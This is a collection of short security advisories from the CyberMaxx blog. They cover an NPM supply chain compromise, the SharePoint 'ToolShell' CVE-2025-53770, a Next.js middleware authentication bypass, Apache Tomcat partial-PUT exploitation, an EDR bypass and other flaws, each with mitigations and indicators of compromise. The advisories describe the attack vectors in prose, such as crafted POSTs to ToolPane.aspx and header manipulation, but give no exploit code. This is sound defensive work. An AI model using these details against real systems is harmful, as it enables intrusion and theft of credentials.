NPM, the backbone of the modern JavaScript ecosystem, has suffered its most significant supply chain compromise to date. The scale is enormous, with more than 2.6 billion weekly downloads affected.

The breach began with the compromise of package maintainer Josh Junon’s accounts. Attackers bypassed protections by exploiting a 2FA reset email. Once inside, they published malicious updates to widely used NPM libraries. Junon confirmed the compromise publicly, sharing both the phishing email and screenshots of the takeover.

The attack was multi-layered. In addition to injecting malicious code into packages, the attackers also set up a credential-harvesting site. The domain they used for phishing also hosted a clone of the official npm[.]js site, designed to capture developer credentials directly.

The scope of impacted packages is unprecedented. Some of the most widely downloaded NPM modules were compromised, including:

• chalk (299.99m weekly downloads)
• debug (357.6m)
• ansi-styles (371.41m)
• supports-color (287.1m)
• strip-ansi (261.17m)
• color-convert (193.5m)
• ansi-regex (243.64m)
• color-name (191.71m)
• is-arrayish (73.8m)
• slice-ansi (59.8m)
• error-ex (47.17m)
• color-string (27.48m)
• simple-swizzle (26.26m)
• chalk-template (3.9m)
• backslash (0.26m)

These libraries sit at the base of countless dependency chains. The infection, therefore, cascades across millions of projects, even if developers never imported the compromised packages directly.

The fallout is immediate. Continuous integration pipelines around the world are now failing npm audits. Organizations are scrambling to identify if their builds pulled in the malicious versions. Given the ubiquity of packages like chalk and debug, it is likely that the compromise has reached into production environments at scale.

This incident highlights a persistent fragility in the open-source supply chain. Centralized ecosystems like NPM magnify both the benefits of reusable code and the risks of compromise. Developers have little visibility into transitive dependencies and often little recourse when upstream maintainers are targeted.

For now, security teams should audit their dependency trees, pin safe versions, and monitor NPM advisories closely. The situation is evolving, and further disclosures are likely as investigators untangle the breadth of the attack.

Further reading and ongoing coverage:
• https://news.ycombinator.com/item?id=45169794
• https://github.com/github/advisory-database/issues/6099

The post Largest NPM Supply Chain Attack Disrupts Billions of Downloads appeared first on CyberMaxx.

SharePoint is a widely used collaboration platform, and this vulnerability targets core components in the SharePoint web interface. As of July 21, emergency patches have been released for SharePoint Subscription Edition, SharePoint Server 2019, and SharePoint Server 2016. If your environment includes on-prem SharePoint servers, you should treat this vulnerability as a priority.

What Is CVE-2025-53770?

CVE-2025-53770 is a remote code execution (RCE) vulnerability in Microsoft SharePoint Server. It allows attackers to send specially crafted HTTP POST requests to vulnerable endpoints like ToolPane.aspx, which is normally used to manage web part settings. By exploiting weaknesses in how SharePoint parses ViewState data and session tokens, attackers can execute arbitrary code on the server.

This exploit does not require prior authentication. A successful attack gives the adversary the ability to upload files, run PowerShell commands, steal cryptographic secrets, or establish persistent access to the server.

In many observed cases, the attackers drop a malicious web shell called spinstall0.aspx inside SharePoint’s \LAYOUTS\ directory. This shell is then used to steal the server’s machine keys – the cryptographic values that secure cookies, authentication tokens, and ViewState.

What Can an Attacker Do?

Once CVE-2025-53770 is exploited successfully, an attacker can:

• Upload a web shell to the SharePoint server
• Steal ASP.NET machine keys used for signing and decrypting ViewState and authentication tokens
• Execute arbitrary code as the SharePoint worker process (w3wp.exe)
• Bypass authentication mechanisms using forged ViewState data
• Persist access even after the web shell is removed, by reusing stolen machine keys
• Move laterally to other systems in the environment

Because this vulnerability can be exploited without user interaction, it is particularly dangerous in environments with internet-facing SharePoint servers.

Mitigations

1. Apply the Official Microsoft Patch

Microsoft has released out-of-band patches for the following editions:

• SharePoint Subscription Edition – KB5002768
• SharePoint Server 2019 – KB5002754
• SharePoint Server 2016 – KB5002745

You should install the patch immediately, even if you have already applied earlier July updates. The new patch contains stronger protections and also includes previous fixes like CVE-2025-49704 and CVE-2025-49706.

2. Rotate ASP.NET Machine Keys

After applying the patch, it is essential to rotate the machine keys found in SharePoint’s web.config files. These are typically located under:

C:\inetpub\wwwroot\wss\VirtualDirectories\[port]\web.config

Generate new validationKey and decryptionKey values, update the config, and restart IIS:

iisreset

This step ensures that any stolen keys can no longer be used to forge tokens or ViewState data.

3. Enable AMSI and Defender Antivirus

Microsoft recommends enabling Antimalware Scan Interface (AMSI) integration for SharePoint and running Microsoft Defender Antivirus in active mode. These tools help detect and block ViewState payloads and other malicious scripts.

Indicators and Threat Hunting

If you suspect compromise or want to validate that no exploitation occurred, look for the following indicators of compromise (IOCs).

Network Requests

Look for POST requests to:

• /_layouts/15/ToolPane.aspx?DisplayMode=Edit

Known IPs

• 107.191.58[.]76
• 104.238.159[.]149
• 96.9.125[.]147

File Artifacts

• Presence of spinstall0.aspx under:

C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\16\TEMPLATE\LAYOUTS\

• Any newly created .aspx files in the \LAYOUTS\ directory

IIS Log Patterns

• POST requests to /sites/*/_layouts/15/ToolPane.aspx
• Suspicious Referer headers like /sites/*/_layouts/SignOut.aspx
• GET requests to spinstall0.aspx with long Base64 parameters

Process Tree Anomalies

· w3wp.exe spawning powershell.exe, cmd.exe, or unusual child processes

Conclusion

CVE-2025-53770 is a serious and actively exploited vulnerability that affects all modern on-prem SharePoint deployments. Even if your servers are not publicly accessible, an attacker with internal access could exploit this flaw to gain full control.

Apply the latest patches from Microsoft, rotate your machine keys, and carefully review your logs for signs of compromise. If you detect any suspicious activity, consider isolating affected systems and initiating a full incident response. Consult your security provider for further information on incident response.

The CyberMaxx team are continuing to monitor for changes and will provide further information as it becomes available.

Further Reading

https://msrc.microsoft.com/blog/2025/07/customer-guidance-for-sharepoint-vulnerability-cve-2025-53770/

The post CVE-2025-53770: SharePoint “ToolShell” Zero-Day Exploit – What You Need to Know appeared first on CyberMaxx.

This vulnerability affects Engineering Special (ES) releases 15.0.1.13010-1 through 15.0.1.13017-1, making them susceptible to unauthenticated SSH logins. In a worst-case scenario, an attacker could exploit this to gain full root privileges and execute arbitrary commands remotely

The issue was uncovered during Cisco’s internal security testing, and so far, there’s no evidence of in-the-wild exploitation. However, the potential impact is high: with root access, threat actors could pivot across networks, intercept calls, alter configurations, or disrupt communications.

Indicators of Compromise

(IoCs) include log entries in /var/log/active/syslog/secure showing a successful sshd login by the root user.

Mitigation

Cisco recommends upgrading vulnerable ES versions to Service Update 3 (15SU3) or applying the patch file ciscocm.CSCwp27755_D0247-1.cop.sha512 via their TAC channel. There are no known workarounds, and non-ES releases (e.g., 12.5, 14.x) are unaffected.

Cisco Unified Communications Manager Static SSH Credentials Vulnerability

The post Critical Cisco Flaw: CVE-2025-20309 Grants Remote Root Access appeared first on CyberMaxx.

This technique requires access to a beachhead host, escalation to administrative access, and a copy of a newer legitimate SentinelOne installation MSI file. Taken together, these factors significantly limit the threat surface of this attack. SentinelOne actively collaborated with Stroz Friedberg to assess the issue and provide mitigation guidance.

CyberMaxx is also conducting a review of its SentinelOne tenant to ensure it aligns with best practices and implement appropriate mitigations to further protect our customers. Our threat intelligence team has utilized the IOCs from the blog post to create detections against suspected attacks. We will continue to monitor for more information and provide that as necessary and available.

Recommendations

• Keep an up-to-date asset inventory.
• Follow regularly scheduled maintenance cycles.
• Disable local admin/install rights for regular users.
• Ensure artifacts from the EDR installation are removed from hosts after installation.

More Reading / Information

• https://www.sentinelone.com/blog/protection-against-local-upgrade-technique-described-in-aon-research/
• https://www-bleepingcomputer-com.cdn.ampproject.org/c/s/www.bleepingcomputer.com/news/security/new-bring-your-own-installer-edr-bypass-used-in-ransomware-attack/amp/
• https://www.aon.com/en/insights/cyber-labs/bring-your-own-installer-bypassing-sentinelone

The post Security Advisory: SentinelOne EDR Bypass Vulnerability appeared first on CyberMaxx.

Shared by @PsExec64, the list uses a tiered system from S Tier to LOL.

Tier breakdown below:

· S Tier: The toughest EDRs to bypass, representing some level of resistance.

· A Tier: Strong performers that require effort to defeat.

· B Tier: Middling, attackers take them seriously but workarounds exist.

· C Tier: Weak enough to be dismissed in most serious attacks.

· D Tier: Almost irrelevant, relatively trivial obstacles.

· LOL Tier: Reserved for tools considered laughably ineffective in real-world breaches.

One surprise was the placement of Microsoft Defender for Endpoint (MDE) in the LOL Tier, sparking discussion among security professionals. While MDE has solid detection capabilities when properly configured, it’s likely that Conti’s low rating reflects how frequently they encounter it in default or poorly secured deployments. Many organizations rely on MDE out of the box without enabling its advanced protections, making it far easier for threat actors to evade — and justifying the “LOL” label in Conti’s eyes.

Later, the group mentioned that they can bypass all EDRs listed – mentioning that some require more work than others.

The post created a lot of discussion in the comments, with various users pointing out benefits and flaws in various platforms.

The key takeaway here is that configuration matters just as much as product choice. Strong tools can become weak if left in their default state and not used to their full potential.

The post Conti Ransomware Gang Rank EDR Solutions Based on Ease of Evasion appeared first on CyberMaxx.

What Is The Vulnerability?

Next.js utilizes an internal header, x-middleware-subrequest, to prevent recursive requests that could lead to infinite loops. However, in affected versions, it is possible to manipulate this header to skip middleware execution. This means that critical checks, including authorization validation, can be circumvented, allowing unauthorized requests to reach protected routes.

Affected Versions

• 15.x prior to 15.2.3
• 14.x prior to 14.2.25
• 13.x prior to 13.5.9

Applications hosted on platforms like Vercel and Netlify, or those deployed as static exports, are not affected by this issue.

Impact

Exploiting this vulnerability can allow an attacker to bypass authentication if authentication is performed via middleware headers.

Mitigation

Upgrade Next.js: Update to the latest patched versions—15.2.3, 14.2.25, or 13.5.9—as applicable to your application.​

Implement Workarounds: If immediate upgrading is not feasible, configure your web server or reverse proxy to block or strip the x-middleware-subrequest header from external requests.

Original blogpost by Rachid Allam who discovered this vulnerability: https://zhero-web-sec.github.io/research-and-things/nextjs-and-the-corrupt-middleware

Testing

The CyberMaxx Security Research team have provided a script to test if your application is potentially vulnerable to CVE-2025-29927. Find it here: GitHub – TheresAFewConors/CVE-2025-29927-Testing

The post CVE-2025-29927: Critical Vulnerability Leading to Authentication Bypass in Next.js appeared first on CyberMaxx.

We assess with a high degree of confidence that this threat was made against the physical domain, not related to cyber infrastructure, we are taking precautions, nonetheless. We have placed clients in the healthcare sector under additional scrutiny and are proactively threat-hunting for techniques that are primarily deployed in persistence-based operations.  We are working to review logs from firewalls, VPNs, remote access services, and Active Directory environments for anomalies that indicate unauthorized access or exploitation.

Likewise, we strongly urge clients to make sure their operating systems and environments are patched / not vulnerable to known and common Active Directory attack paths such as PrintNightmare (CVE-2021-34527), Zerologon (CVE-2020-1472), and LDAP Nightmare (CVE-2021-42278 & CVE-2021-42287) which allow an attacker living on a perimeter device to escalate privileges and maintain persistent access to the active directory environment.

Recommendations

• Review & Strengthen Physical Security Measures:
• Assess physical security, cybersecurity, and emergency management plans.
• Ensure visible security presence to deter potential threats.
• Focus on facilities in mid-tier cities with lower security, as they are mentioned as primary targets.

More Information

https://health-isac.org/potential-terror-threat-targeted-at-health-sector-aha-health-isac-joint-threat-bulletin/

The post Potential Terror Threat Targeted at Health Sector – AHA & Health-ISAC Joint Threat Bulletin appeared first on CyberMaxx.

Exploitation can occur through a malformed PUT request to the API when the following conditions are met:

• Writes enabled for the default servlet (readonly=”false”) – (disabled by default).
• Support for partial PUT (enabled by default).
• A target URL for security sensitive uploads that is a sub-directory of a target URL for public uploads.
• Attacker knowledge of the names of security sensitive files being uploaded.
• The security sensitive files are also being uploaded via partial PUT.

Multiple sources have confirmed that this vulnerability is being actively exploited in the wild, utilizing a POC that was posted 2025-03-17.

Patched versions are available, and it is recommended to immediately download and patch the affected servers utilizing Apache Tomcat. Due to active exploitation of these vulnerabilities, the CyberMaxx team recommends a full compromise assessment.

CyberMaxx is monitoring the situation and will provide updates and remediation guidelines as they become available over the coming days.

References:

• https://thehackernews.com/2025/03/apache-tomcat-vulnerability-comes-under.html
• https://lab.wallarm.com/one-put-request-to-own-tomcat-cve-2025-24813-rce-is-in-the-wild/

The post ApacheTomCat: CVE-2025-24813 appeared first on CyberMaxx.

• CVE-2025-22224: Located in the VMCI interface, which can allow for out-of-bounds memory write leading to a heap overflow. Rated 9.3
• CVE-2025-22225: Arbitrary write vulnerability that enables an attacker (with sufficient write privileges) to write into kernel memory. (Privilege Escalation to Sandbox Escape vulnerability). Rated 8.2
• CVE-2025-22226: Out-of-bounds memory read in the HGFS component leading to information leakage. Attackers with admin permissions in a VM can exploit this to leak memory from the VMX process. Rated 7.1

VMWare has confirmed that this vulnerability is being actively exploited in the wild.

Patches are available and it is recommended to immediately download and patch affected products. Due to the active exploitation of these vulnerabilities, the CyberMaxx team recommends to perform a full compromise assessment. No exploits are publicly available, and indicators of compromise have not yet been released.

CyberMaxx is monitoring the situation and will provide updates and remediation guidelines as they become available over the coming days.

Official Advisory: https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/25390

The post 3 Vulnerabilities Identified in VMWare’s ESXi, allowing for VM Escape appeared first on CyberMaxx.

LDAPNightmare, identified as CVE-2024-49113, is a denial-of-service (DoS) vulnerability in Microsoft’s Lightweight Directory Access Protocol (LDAP) affecting various Windows versions. Discovered in December 2024 by security researcher Yuki Chen, this flaw allows remote, unauthenticated attackers to crash the Local Security Authority Subsystem Service (LSASS) on unpatched Windows servers, leading to system reboots. CVE-2024-49112 allows remote, unauthenticated attackers to execute arbitrary code within the context of the LDAP service by sending specially crafted Remote Procedure Call (RPC) requests.

On January 1, 2025, SafeBreach Labs released a proof-of-concept (PoC) exploit demonstrating how an attacker can crash any unpatched Windows Server by sending a specially crafted Connectionless LDAP (CLDAP) referral response packet. The PoC can be found here: https://github.com/SafeBreach-Labs/CVE-2024-49113

Microsoft addressed CVE-2024-49112 in its December 2024 Patch Tuesday updates. Organizations are strongly advised to apply these patches immediately to protect their systems from potential exploitation.

Detection

On January 8th, 2025; A pull request was opened for the Sigma Github repo which contained a potential detection opportunity. This Sigma focused on the crashing of the LSASS process involving WLDAP32.dll in the Windows Application Log (Event ID 1000).

This pull request can be found here: https://github.com/SigmaHQ/sigma/pull/5155

Mitigation

Apply the updates and patches provided by Microsoft in the December 2024 Path Tuesday release. Also, Configure Extended Protection for Authentication (EPA) for LDAP, as recommended by Microsoft. This adds additional security layers to prevent exploitation.

This post will be updated as more information becomes available throughout the coming days.

The post LDAPNightmare Detection & Mitigation: CVE-2024-49113 & CVE-2024-49112 appeared first on CyberMaxx.